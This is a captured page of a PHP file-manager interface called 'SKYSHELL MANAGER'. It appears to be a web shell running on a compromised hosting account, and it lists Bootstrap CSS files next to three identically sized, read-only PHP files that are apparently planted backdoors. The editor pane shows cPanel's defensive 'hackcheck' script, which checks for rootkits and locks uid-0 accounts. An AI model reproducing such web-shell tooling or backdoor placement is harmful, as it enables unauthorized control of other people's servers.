📁
SKYSHELL MANAGER-
🛒
PHP v7.4.33
Create Folder
Create File
Current Path:
home
/
oshofree
/
public_html
/
chbluxuryempire.com
/
academy
/
assets
/
vendor
/
bootstrap
/
css
/
Name
Size
Permissions
Actions
📁
..
-
0755
🗑️
🔒
📄
bootstrap-utilities.min.css.map
104.69 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-utilities.rtl.css
67.22 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-utilities.rtl.css.map
178.52 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-utilities.rtl.min.css
49.94 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-utilities.rtl.min.css.map
104.53 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap.css
191.25 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap.css.map
500.48 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap.min.css
151.98 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap.min.css.map
419.41 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap.rtl.css
190.55 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap.rtl.css.map
500.38 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap.rtl.min.css.map
617.97 KB
0644
🗑️
⬇️
✏️
🔒
📄
config.php
7.06 KB
0444
🗑️
⬇️
✏️
🔒
📄
core.php
7.06 KB
0444
🗑️
⬇️
✏️
🔒
📄
error_log
971.31 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-utilities.min.css
50.01 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-utilities.css
67.35 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-utilities.css.map
178.58 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-grid.rtl.min.css
50.37 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-grid.css
69.07 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-grid.css.map
185.87 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-grid.min.css
50.3 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-grid.min.css.map
113.07 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-grid.rtl.css
69.14 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-grid.rtl.css.map
185.87 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-grid.rtl.min.css.map
113.15 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-reboot.rtl.min.css.map
39.26 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-reboot.css
5.74 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-reboot.css.map
96.73 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-reboot.min.css
4.56 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-reboot.min.css.map
33.12 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-reboot.rtl.css
5.72 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-reboot.rtl.css.map
96.74 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-reboot.rtl.min.css
4.63 KB
0644
🗑️
⬇️
✏️
🔒
📄
system.php
7.06 KB
0444
🗑️
⬇️
✏️
🔒
Editing: hackcheck
#!/usr/local/cpanel/3rdparty/bin/perl # cpanel - scripts/hackcheck Copyright 2022 cPanel, L.L.C. # All rights reserved. # copyright@cpanel.net http://cpanel.net # This code is subject to the cPanel license. Unauthorized copying is prohibited use Cpanel::Rand (); use Cpanel::FileUtils::TouchFile (); use Cpanel::SafeDir::MK (); $| = 1; my $tmpdir = Cpanel::Rand::gettmpdir(); # audit case 46806 ok my $is_hacked = ''; if ( -d $tmpdir ) { foreach my $num ( 0 .. 9 ) { Cpanel::FileUtils::TouchFile::touchfile("$tmpdir/$num"); if ( !-f "$tmpdir/$num" ) { $is_hacked = "Could not create file $tmpdir/$num: $!"; last; } elsif ( !unlink("$tmpdir/$num") ) { $is_hacked = "Could not remove file $tmpdir/$num: $!"; last; } Cpanel::SafeDir::MK::safemkdir("$tmpdir/$num"); if ( !-d "$tmpdir/$num" ) { $is_hacked = "Could not create directory $tmpdir/$num: $!"; last; } elsif ( !rmdir("$tmpdir/$num") ) { $is_hacked = "Could not remove directory $tmpdir/$num: $!"; last; } } if ( !$is_hacked ) { if ( !rmdir($tmpdir) ) { $is_hacked = "Could not remove directory $tmpdir: $!"; } } } else { # Can't make random directory in /tmp $is_hacked = "Failed to create directory $tmpdir: $!"; } my $msg = <<"EOM"; Attempts to create new directories or files whose filenames begin with numbers have failed. This is indicative of a root compromise of the server. The exact error encountered was: $is_hacked EOM if ($is_hacked) { print "[hackcheck] Possible rootkit detected\n$msg"; require Cpanel::Notify; Cpanel::Notify::notification_class( 'class' => 'Check::Hack', 'application' => 'Check::Hack', 'constructor_args' => [ 'origin' => 'hackcheck', 'reason' => $is_hacked ] ); } exit if -e '/etc/disablehackcheck'; foreach my $account (qw(xfs daemon)) { my @pwnam = getpwnam($account); next if !$pwnam[0]; if ( $pwnam[1] !~ m{^[\!\*]} ) { system( "/usr/bin/passwd", "-l", $account ); } } my ( $user, $uid ); open( my $passwd, '<', "/etc/passwd" ); while (<$passwd>) { next if (m/^\#/); ( $user, undef, $uid, undef ) = split( /:/, $_, 3 ); next if ( !defined $uid ); if ( $uid == 0 && $user ne "root" && $user ne "toor" ) { system( '/usr/bin/passwd', '-l', $user ); print "[hackcheck] $user has a uid 0 account (root access).\n"; require Cpanel::Notify; Cpanel::Notify::notification_class( 'class' => 'Check::Hack', 'application' => 'Check::Hack', 'constructor_args' => [ 'origin' => 'hackcheck', 'suspicious_user' => $user ] ); } } close($passwd);
💾 Save Changes